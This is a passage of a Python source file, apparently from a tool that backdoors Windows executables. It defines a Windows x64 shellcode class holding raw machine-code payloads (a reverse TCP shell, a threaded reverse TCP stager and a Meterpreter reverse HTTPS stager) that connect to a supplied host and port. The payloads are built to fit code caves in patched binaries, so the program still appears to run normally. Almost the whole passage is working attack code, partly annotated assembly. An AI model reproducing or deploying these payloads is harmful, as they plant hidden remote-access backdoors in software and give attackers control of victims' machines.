ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
'''
##########################################################
# BEGIN win64 shellcodes #
##########################################################
import struct
from intelmodules import eat_code_caves
class winI64_shellcode():
"""
Windows Intel x64 shellcode class
"""
def __init__(self, HOST, PORT, SUPPLIED_SHELLCODE):
self.HOST = HOST
self.PORT = PORT
self.SUPPLIED_SHELLCODE = SUPPLIED_SHELLCODE
self.shellcode = ""
self.stackpreserve = ("\x90\x90\x50\x53\x51\x52\x56\x57\x54\x55\x41\x50"
"\x41\x51\x41\x52\x41\x53\x41\x54\x41\x55\x41\x56\x41\x57\x9c"
)
self.stackrestore = ("\x9d\x41\x5f\x41\x5e\x41\x5d\x41\x5c\x41\x5b\x41\x5a\x41\x59"
"\x41\x58\x5d\x5c\x5f\x5e\x5a\x59\x5b\x58"
)
self.apis_needed = None
def pack_ip_addresses(self):
hostocts = []
for i, octet in enumerate(self.HOST.split('.')):
hostocts.append(int(octet))
self.hostip = struct.pack('=BBBB', hostocts[0], hostocts[1],
hostocts[2], hostocts[3])
return self.hostip
def returnshellcode(self):
return self.shellcode
def clean_caves_stub(self, CavesToFix):
stub = ("\x48\x31\xC0" # xor rax,rax
"\x65\x48\x8B\x49\x60" # mov rcx,QWORD PTR gs:[rcx+0x60]
"\x48\x8B\x49\x10" # mov rcx,QWORD PTR [rcx+0x10]
"\x48\x89\xCB" # mov rbx,rcx
)
for cave, values in CavesToFix.iteritems():
stub += "\x48\xbf" # mov rdi, value below
stub += struct.pack("<Q", values[0])
stub += "\x48\x01\xDF" # add rdi, rbx
stub += "\x48\xb9" # mov rcx, value below
stub += struct.pack("<Q", values[1])
stub += "\xf3\xaa" # REP STOS BYTE PTR ES:[EDI]
return stub
def reverse_shell_tcp_inline(self, flItms, CavesPicked={}):
"""
Modified metasploit windows/x64/shell_reverse_tcp
"""
if self.PORT is None:
print ("This payload requires the PORT parameter -P")
return False
if self.HOST is None:
print "This payload requires a HOST parameter -H"
return False
breakupvar = eat_code_caves(flItms, 0, 1)
self.shellcode1 = ("\xfc"
"\x48\x83\xe4\xf0"
"\xe8")
if flItms['cave_jumping'] is True:
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar -
len(self.stackpreserve) - len(self.shellcode1) - 3)
else:
self.shellcode1 += "\xc0\x00\x00\x00"
self.shellcode1 += ("\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff")
self.shellcode2 = ("\x5d\x49\xbe\x77\x73\x32\x5f\x33"
"\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00"
"\x49\x89\xe5\x49\xbc\x02\x00")
self.shellcode2 += struct.pack('!H', self.PORT)
self.shellcode2 += self.pack_ip_addresses()
self.shellcode2 += ("\x41\x54"
"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c"
"\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff"
"\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2"
"\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48"
"\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99"
"\xa5\x74\x61\xff\xd5\x48\x81\xc4\x40\x02\x00\x00\x49\xb8\x63"
"\x6d\x64\x00\x00\x00\x00\x00\x41\x50\x41\x50\x48\x89\xe2\x57"
"\x57\x57\x4d\x31\xc0\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44"
"\x24\x54\x01\x01\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6"
"\x56\x50\x41\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff"
"\xc8\x4d\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5"
"\x48\x31\xd2\x90\x90\x90\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff"
"\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48"
"\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13"
"\x72\x6f\x6a\x00\x59\x41\x89\xda"
"\x48\x81\xc4\xf8\x00\x00\x00" # Add RSP X ; align stack
)
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2 + self.stackrestore
return (self.stackpreserve + self.shellcode1, self.shellcode2 + self.stackrestore)
def reverse_tcp_stager_threaded(self, flItms, CavesPicked={}):
"""
Ported the x32 payload from msfvenom for patching win32 binaries (shellcode1)
with the help of Steven Fewer's work on msf win64 payloads.
"""
if self.PORT is None:
print ("This payload requires the PORT parameter -P")
return False
if self.HOST is None:
print "This payload requires a HOST parameter -H"
return False
flItms['stager'] = True
#overloading the class stackpreserve
self.stackpreserve = ("\x90\x50\x53\x51\x52\x56\x57\x55\x41\x50"
"\x41\x51\x41\x52\x41\x53\x41\x54\x41\x55\x41\x56\x41\x57\x9c"
)
breakupvar = eat_code_caves(flItms, 0, 1)
#get_payload: #Jump back with the address for the payload on the stack.
if flItms['cave_jumping'] is True:
self.shellcode2 = "\xe8"
if breakupvar > 0:
if len(self.shellcode2) < breakupvar:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - breakupvar -
len(self.shellcode2) + 272).rstrip('L')), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - len(self.shellcode2) -
breakupvar + 272).rstrip('L')), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(abs(breakupvar) + len(self.stackpreserve) +
len(self.shellcode2) + 244).rstrip('L')), 16))
else:
self.shellcode2 = "\xE8\xB8\xFF\xFF\xFF"
"""
shellcode2
/*
* windows/x64/shell/reverse_tcp - 422 bytes (stage 1)
^^windows/x64/meterpreter/reverse_tcp will work with this
* http://www.metasploit.com
* VERBOSE=false, LHOST=127.0.0.1, LPORT=8080,
*/
"""
if flItms['NewCodeCave'] is False:
if CavesPicked != {}:
self.shellcode2 += self.clean_caves_stub(flItms['CavesToFix'])
else:
self.shellcode2 += "\x41" * 90
#payload
self.shellcode2 += ("\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33"
"\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00"
"\x49\x89\xe5\x49\xbc\x02\x00"
)
self.shellcode2 += struct.pack('!H', self.PORT)
self.shellcode2 += self.pack_ip_addresses()
self.shellcode2 += ("\x41\x54"
"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c"
"\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff"
"\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2"
"\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48"
"\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99"
"\xa5\x74\x61\xff\xd5\x48\x81\xc4\x40\x02\x00\x00\x48\x83\xec"
"\x10\x48\x89\xe2\x4d\x31\xc9\x6a\x04\x41\x58\x48\x89\xf9\x41"
"\xba\x02\xd9\xc8\x5f\xff\xd5\x48\x83\xc4\x20\x5e\x6a\x40\x41"
"\x59\x68\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41"
"\xba\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8"
"\x5f\xff\xd5\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xe1\x41"
"\xff\xe7"
)
breakupvar = eat_code_caves(flItms, 0, 1)
self.shellcode1 = ("\x90" # <--THAT'S A NOP. \o/
"\xe8\xc0\x00\x00\x00" # jmp to allocate
#api_call
"\x41\x51" # push r9
"\x41\x50" # push r8
"\x52" # push rdx
"\x51" # push rcx
"\x56" # push rsi
"\x48\x31\xD2" # xor rdx,rdx
"\x65\x48\x8B\x52\x60" # mov rdx,qword ptr gs:[rdx+96]
"\x48\x8B\x52\x18" # mov rdx,qword ptr [rdx+24]
"\x48\x8B\x52\x20" # mov rdx,qword ptr[rdx+32]
#next_mod
"\x48\x8b\x72\x50" # mov rsi,[rdx+80]
"\x48\x0f\xb7\x4a\x4a" # movzx rcx,word [rdx+74]
"\x4d\x31\xc9" # xor r9,r9
#loop_modname
"\x48\x31\xc0" # xor rax,rax
"\xac" # lods
"\x3c\x61" # cmp al, 61h (a)
"\x7c\x02" # jl 02
"\x2c\x20" # sub al, 0x20
#not_lowercase
"\x41\xc1\xc9\x0d" # ror r9d, 13
"\x41\x01\xc1" # add r9d, eax
"\xe2\xed" # loop until read, back to xor rax, rax
"\x52" # push rdx ; Save the current position in the module list for later
"\x41\x51" # push r9 ; Save the current module hash for later
# ; Proceed to itterate the export address table,
"\x48\x8b\x52\x20" # mov rdx, [rdx+32] ; Get this modules base address
"\x8b\x42\x3c" # mov eax, dword [rdx+60] ; Get PE header
"\x48\x01\xd0" # add rax, rdx ; Add the modules base address
"\x8b\x80\x88\x00\x00\x00" # mov eax, dword [rax+136] ; Get export tables RVA
"\x48\x85\xc0" # test rax, rax ; Test if no export address table is present
"\x74\x67" # je get_next_mod1 ; If no EAT present, process the next module
"\x48\x01\xd0" # add rax, rdx ; Add the modules base address
"\x50" # push rax ; Save the current modules EAT
"\x8b\x48\x18" # mov ecx, dword [rax+24] ; Get the number of function names
"\x44\x8b\x40\x20" # mov r8d, dword [rax+32] ; Get the rva of the function names
"\x49\x01\xd0" # add r8, rdx ; Add the modules base address
# ; Computing the module hash + function hash
#get_next_func: ;
"\xe3\x56" # jrcxz get_next_mod ; When we reach the start of the EAT (we search backwards), process the next module
"\x48\xff\xc9" # dec rcx ; Decrement the function name counter
"\x41\x8b\x34\x88" # mov esi, dword [r8+rcx*4]; Get rva of next module name
"\x48\x01\xd6" # add rsi, rdx ; Add the modules base address
"\x4d\x31\xc9" # xor r9, r9 ; Clear r9 which will store the hash of the function name
# ; And compare it to the one we wan
#loop_funcname: ;
"\x48\x31\xc0" # xor rax, rax ; Clear rax
"\xac" # lodsb ; Read in the next byte of the ASCII function name
"\x41\xc1\xc9\x0d" # ror r9d, 13 ; Rotate right our hash value
"\x41\x01\xc1" # add r9d, eax ; Add the next byte of the name
"\x38\xe0" # cmp al, ah ; Compare AL (the next byte from the name) to AH (null)
"\x75\xf1" # jne loop_funcname ; If we have not reached the null terminator, continue
"\x4c\x03\x4c\x24\x08" # add r9, [rsp+8] ; Add the current module hash to the function hash
"\x45\x39\xd1" # cmp r9d, r10d ; Compare the hash to the one we are searchnig for
"\x75\xd8" # jnz get_next_func ; Go compute the next function hash if we have not found it
# ; If found, fix up stack, call the function and then value else compute the next one...
"\x58" # pop rax ; Restore the current modules EAT
"\x44\x8b\x40\x24" # mov r8d, dword [rax+36] ; Get the ordinal table rva
"\x49\x01\xd0" # add r8, rdx ; Add the modules base address
"\x66\x41\x8b\x0c\x48" # mov cx, [r8+2*rcx] ; Get the desired functions ordinal
"\x44\x8b\x40\x1c" # mov r8d, dword [rax+28] ; Get the function addresses table rva
"\x49\x01\xd0" # add r8, rdx ; Add the modules base address
"\x41\x8b\x04\x88" # mov eax, dword [r8+4*rcx]; Get the desired functions RVA
"\x48\x01\xd0" # add rax, rdx ; Add the modules base address to get the functions actual VA
# ; We now fix up the stack and perform the call to the drsired function...
#finish:
"\x41\x58" # pop r8 ; Clear off the current modules hash
"\x41\x58" # pop r8 ; Clear off the current position in the module list
"\x5E" # pop rsi ; Restore RSI
"\x59" # pop rcx ; Restore the 1st parameter
"\x5A" # pop rdx ; Restore the 2nd parameter
"\x41\x58" # pop r8 ; Restore the 3rd parameter
"\x41\x59" # pop r9 ; Restore the 4th parameter
"\x41\x5A" # pop r10 ; pop off the return address
"\x48\x83\xEC\x20" # sub rsp, 32 ; reserve space for the four register params (4 * sizeof(QWORD) = 32)
# ; It is the callers responsibility to restore RSP if need be (or alloc more space or align RSP).
"\x41\x52" # push r10 ; push back the return address
"\xFF\xE0" # jmp rax ; Jump into the required function
# ; We now automagically return to the correct caller...
# get_next_mod:
"\x58" # pop rax ; Pop off the current (now the previous) modules EAT
# get_next_mod1:
"\x41\x59" # pop r9 ; Pop off the current (now the previous) modules hash
"\x5A" # pop rdx ; Restore our position in the module list
"\x48\x8B\x12" # mov rdx, [rdx] ; Get the next module
"\xe9\x57\xff\xff\xff" # jmp next_mod ; Process this module
)
# allocate
self.shellcode1 += ("\x5d" # pop rbp
"\x49\xc7\xc6") # mov r14, size of payload below
self.shellcode1 += struct.pack("<I", len(self.shellcode2) - 5)
self.shellcode1 += ("\x6a\x40" # push 40h
"\x41\x59" # pop r9 now 40h
"\x68\x00\x10\x00\x00" # push 1000h
"\x41\x58" # pop r8.. now 1000h
"\x4C\x89\xF2" # mov rdx, r14
"\x6A\x00" # push 0
"\x59" # pop rcx
"\x68\x58\xa4\x53\xe5" # push E553a458
"\x41\x5A" # pop r10
"\xff\xd5" # call rbp
"\x48\x89\xc3" # mov rbx, rax ; Store allocated address in ebx
"\x48\x89\xc7" # mov rdi, rax ; Prepare EDI with the new address
"\x48\xC7\xC1"
)
self.shellcode1 += struct.pack("<I", len(self.shellcode2) - 5)
#call the get_payload right before the payload
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
else:
self.shellcode1 += "\xeb\x43"
# got_payload:
self.shellcode1 += ("\x5e" # pop rsi ; Prepare ESI with the source to copy
"\xf2\xa4" # rep movsb ; Copy the payload to RWX memory
"\xe8\x00\x00\x00\x00" # call set_handler ; Configure error handling
#set_handler:
"\x48\x31\xC0" # xor rax,rax
"\x50" # push rax ; LPDWORD lpThreadId (NULL)
"\x50" # push rax ; DWORD dwCreationFlags (0)
"\x49\x89\xC1" # mov r9, rax ; LPVOID lpParameter (NULL)
"\x48\x89\xC2" # mov rdx, rax ; LPTHREAD_START_ROUTINE lpStartAddress (payload)
"\x49\x89\xD8" # mov r8, rbx ; SIZE_T dwStackSize (0 for default)
"\x48\x89\xC1" # mov rcx, rax ; LPSECURITY_ATTRIBUTES lpThreadAttributes (NULL)
"\x49\xC7\xC2\x38\x68\x0D\x16" # mov r10, 0x160D6838 ; hash( "kernel32.dll", "CreateThread" )
"\xFF\xD5" # call rbp ; Spawn payload thread
"\x48\x83\xC4\x58" # add rsp, 50
#stackrestore
"\x9d\x41\x5f\x41\x5e\x41\x5d\x41\x5c\x41\x5b\x41\x5a\x41\x59"
"\x41\x58\x5d\x5f\x5e\x5a\x59\x5b\x58"
)
breakupvar = eat_code_caves(flItms, 0, 2)
#Jump to the win64 return to normal execution code segment.
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(0xffffffff + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3).rstrip('L')), 16))
else:
#self.shellcode1 += "\xE9\xab\x01\x00\x00"
self.shellcode1 += "\xe9"
self.shellcode1 += struct.pack("<I", len(self.shellcode2))
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2
return (self.stackpreserve + self.shellcode1, self.shellcode2)
def meterpreter_reverse_https_threaded(self, flItms, CavesPicked={}):
"""
Win64 version
"""
if self.PORT is None:
print ("This payload requires the PORT parameter -P")
return False
if self.HOST is None:
print "This payload requires a HOST parameter -H"
return False
flItms['stager'] = True
#overloading the class stackpreserve
self.stackpreserve = ("\x90\x50\x53\x51\x52\x56\x57\x55\x41\x50"
"\x41\x51\x41\x52\x41\x53\x41\x54\x41\x55\x41\x56\x41\x57\x9c"
)
breakupvar = eat_code_caves(flItms, 0, 1)
#get_payload: #Jump back with the address for the payload on the stack.
if flItms['cave_jumping'] is True:
self.shellcode2 = "\xe8"
if breakupvar > 0:
if len(self.shellcode2) < breakupvar:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - breakupvar -
len(self.shellcode2) + 272).rstrip('L')), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - len(self.shellcode2) -
breakupvar + 272).rstrip('L')), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(abs(breakupvar) + len(self.stackpreserve) +
len(self.shellcode2) + 244).rstrip('L')), 16))
else:
self.shellcode2 = "\xE8\xB8\xFF\xFF\xFF"
"""
/*
* windows/x64/meterpreter/reverse_https - 587 bytes (stage 1)
* http://www.metasploit.com
* VERBOSE=false, LHOST=127.0.0.1, LPORT=8080,
* SessionExpirationTimeout=604800,
* SessionCommunicationTimeout=300,
* MeterpreterUserAgent=Mozilla/4.0 (compatible; MSIE 6.1;
* Windows NT), MeterpreterServerName=Apache,
* ReverseListenerBindPort=0,
* HttpUnknownRequestResponse=<html><body><h1>It
* works!</h1></body></html>, EnableStageEncoding=false,
* PrependMigrate=false, EXITFUNC=thread, AutoLoadStdapi=true,
* InitialAutoRunScript=, AutoRunScript=, AutoSystemInfo=true,
* EnableUnicodeEncoding=true
*/
"""
if flItms['NewCodeCave'] is False:
if CavesPicked != {}:
self.shellcode2 += self.clean_caves_stub(flItms['CavesToFix'])
else:
self.shellcode2 += "\x41" * 90
#payload
self.shellcode2 += ("\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00"
"\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b"
"\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01"
"\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8"
"\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b"
"\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41"
"\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41"
"\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff"
"\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56"
"\x49\x89\xe6\x4c\x89\xf1\x49\xba\x4c\x77\x26\x07\x00\x00\x00"
"\x00\xff\xd5\x6a\x00\x6a\x00\x48\x89\xe1\x48\x31\xd2\x4d\x31"
"\xc0\x4d\x31\xc9\x41\x50\x41\x50\x49\xba\x3a\x56\x79\xa7\x00"
"\x00\x00\x00\xff\xd5\xe9\x9e\x00\x00\x00\x5a\x48\x89\xc1\x49"
"\xb8")
self.shellcode2 += struct.pack("<H", self.PORT)
self.shellcode2 += ("\x00\x00\x00\x00\x00\x00\x4d\x31\xc9\x41\x51\x41"
"\x51\x6a\x03\x41\x51\x49\xba\x57\x89\x9f\xc6\x00\x00\x00\x00"
"\xff\xd5\xeb\x7c\x48\x89\xc1\x48\x31\xd2\x41\x58\x4d\x31\xc9"
"\x52\x68\x00\x32\xa0\x84\x52\x52\x49\xba\xeb\x55\x2e\x3b\x00"
"\x00\x00\x00\xff\xd5\x48\x89\xc6\x6a\x0a\x5f\x48\x89\xf1\x48"
"\xba\x1f\x00\x00\x00\x00\x00\x00\x00\x6a\x00\x68\x80\x33\x00"
"\x00\x49\x89\xe0\x49\xb9\x04\x00\x00\x00\x00\x00\x00\x00\x49"
"\xba\x75\x46\x9e\x86\x00\x00\x00\x00\xff\xd5\x48\x89\xf1\x48"
"\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x52\x52\x49\xba\x2d\x06\x18"
"\x7b\x00\x00\x00\x00\xff\xd5\x85\xc0\x75\x24\x48\xff\xcf\x74"
"\x13\xeb\xb1\xe9\x81\x00\x00\x00\xe8\x7f\xff\xff\xff\x2f\x75"
"\x47\x48\x58\x00\x00\x49\xbe\xf0\xb5\xa2\x56\x00\x00\x00\x00"
"\xff\xd5\x48\x31\xc9\x48\xba\x00\x00\x40\x00\x00\x00\x00\x00"
"\x49\xb8\x00\x10\x00\x00\x00\x00\x00\x00\x49\xb9\x40\x00\x00"
"\x00\x00\x00\x00\x00\x49\xba\x58\xa4\x53\xe5\x00\x00\x00\x00"
"\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda"
"\x49\xb8\x00\x20\x00\x00\x00\x00\x00\x00\x49\x89\xf9\x49\xba"
"\x12\x96\x89\xe2\x00\x00\x00\x00\xff\xd5\x48\x83\xc4\x20\x85"
"\xc0\x74\x99\x48\x8b\x07\x48\x01\xc3\x48\x85\xc0\x75\xce\x58"
"\x58\xc3\xe8\xd7\xfe\xff\xff")
self.shellcode2 += self.HOST
self.shellcode2 += "\x00"
breakupvar = eat_code_caves(flItms, 0, 1)
self.shellcode1 = ("\x90" # <--THAT'S A NOP. \o/
"\xe8\xc0\x00\x00\x00" # jmp to allocate
#api_call
"\x41\x51" # push r9
"\x41\x50" # push r8
"\x52" # push rdx
"\x51" # push rcx
"\x56" # push rsi
"\x48\x31\xD2" # xor rdx,rdx
"\x65\x48\x8B\x52\x60" # mov rdx,qword ptr gs:[rdx+96]
"\x48\x8B\x52\x18" # mov rdx,qword ptr [rdx+24]
"\x48\x8B\x52\x20" # mov rdx,qword ptr[rdx+32]
#next_mod
"\x48\x8b\x72\x50" # mov rsi,[rdx+80]
"\x48\x0f\xb7\x4a\x4a" # movzx rcx,word [rdx+74]
"\x4d\x31\xc9" # xor r9,r9
#loop_modname
"\x48\x31\xc0" # xor rax,rax
"\xac" # lods
"\x3c\x61" # cmp al, 61h (a)
"\x7c\x02" # jl 02
"\x2c\x20" # sub al, 0x20
#not_lowercase
"\x41\xc1\xc9\x0d" # ror r9d, 13
"\x41\x01\xc1" # add r9d, eax
"\xe2\xed" # loop until read, back to xor rax, rax
"\x52" # push rdx ; Save the current position in the module list for later
"\x41\x51" # push r9 ; Save the current module hash for later
# ; Proceed to itterate the export address table,
"\x48\x8b\x52\x20" # mov rdx, [rdx+32] ; Get this modules base address
"\x8b\x42\x3c" # mov eax, dword [rdx+60] ; Get PE header
"\x48\x01\xd0" # add rax, rdx ; Add the modules base address
"\x8b\x80\x88\x00\x00\x00" # mov eax, dword [rax+136] ; Get export tables RVA
"\x48\x85\xc0" # test rax, rax ; Test if no export address table is present
"\x74\x67" # je get_next_mod1 ; If no EAT present, process the next module
"\x48\x01\xd0" # add rax, rdx ; Add the modules base address
"\x50" # push rax ; Save the current modules EAT
"\x8b\x48\x18" # mov ecx, dword [rax+24] ; Get the number of function names
"\x44\x8b\x40\x20" # mov r8d, dword [rax+32] ; Get the rva of the function names
"\x49\x01\xd0" # add r8, rdx ; Add the modules base address
#; Computing the module hash + function hash
#get_next_func: ;
"\xe3\x56" # jrcxz get_next_mod ; When we reach the start of the EAT (we search backwards), process the next module
"\x48\xff\xc9" # dec rcx ; Decrement the function name counter
"\x41\x8b\x34\x88" # mov esi, dword [r8+rcx*4]; Get rva of next module name
"\x48\x01\xd6" # add rsi, rdx ; Add the modules base address
"\x4d\x31\xc9" # xor r9, r9 ; Clear r9 which will store the hash of the function name
# ; And compare it to the one we wan
#loop_funcname: ;
"\x48\x31\xc0" # xor rax, rax ; Clear rax
"\xac" # lodsb ; Read in the next byte of the ASCII function name
"\x41\xc1\xc9\x0d" # ror r9d, 13 ; Rotate right our hash value
"\x41\x01\xc1" # add r9d, eax ; Add the next byte of the name
"\x38\xe0" # cmp al, ah ; Compare AL (the next byte from the name) to AH (null)
"\x75\xf1" # jne loop_funcname ; If we have not reached the null terminator, continue
"\x4c\x03\x4c\x24\x08" # add r9, [rsp+8] ; Add the current module hash to the function hash
"\x45\x39\xd1" # cmp r9d, r10d ; Compare the hash to the one we are searchnig for
"\x75\xd8" # jnz get_next_func ; Go compute the next function hash if we have not found it
# ; If found, fix up stack, call the function and then value else compute the next one...
"\x58" # pop rax ; Restore the current modules EAT
"\x44\x8b\x40\x24" # mov r8d, dword [rax+36] ; Get the ordinal table rva
"\x49\x01\xd0" # add r8, rdx ; Add the modules base address
"\x66\x41\x8b\x0c\x48" # mov cx, [r8+2*rcx] ; Get the desired functions ordinal
"\x44\x8b\x40\x1c" # mov r8d, dword [rax+28] ; Get the function addresses table rva
"\x49\x01\xd0" # add r8, rdx ; Add the modules base address
"\x41\x8b\x04\x88" # mov eax, dword [r8+4*rcx]; Get the desired functions RVA
"\x48\x01\xd0" # add rax, rdx ; Add the modules base address to get the functions actual VA
#; We now fix up the stack and perform the call to the drsired function...
#finish:
"\x41\x58" # pop r8 ; Clear off the current modules hash
"\x41\x58" # pop r8 ; Clear off the current position in the module list
"\x5E" # pop rsi ; Restore RSI
"\x59" # pop rcx ; Restore the 1st parameter
"\x5A" # pop rdx ; Restore the 2nd parameter
"\x41\x58" # pop r8 ; Restore the 3rd parameter
"\x41\x59" # pop r9 ; Restore the 4th parameter
"\x41\x5A" # pop r10 ; pop off the return address
